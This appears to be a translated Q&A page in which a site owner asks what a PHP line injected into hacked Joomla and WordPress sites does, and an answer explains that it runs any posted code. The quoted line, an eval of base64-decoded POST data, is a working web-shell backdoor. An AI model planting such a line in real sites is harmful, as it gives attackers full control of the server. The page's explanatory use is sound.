base64_decode在php文件中注入了代码

时间:2014-05-12 10:16:39

标签: php security

很抱歉,如果这是一个错误的地方提出这个问题,但我想知道下面的代码会做什么。我经常看到这种代码。我不知道这段代码是做什么的。黑客通常在攻击网站后在joomla和wordpress网站的许多页面中注入此类代码。如果任何人都可以解释代码,那么我将是gald。

<?php eval(base64_decode($_POST['na7fe23']));?>

1 个答案:

答案 0 :(得分:2)

如果有人在字段中发布了大量的PHP代码,那么na7fe23&#39;到这个脚本,然后发布的代码将在您的服务器上执行。

这基本上允许任何人在您的服务器上执行任何PHP脚本,因此您会受到严重损害。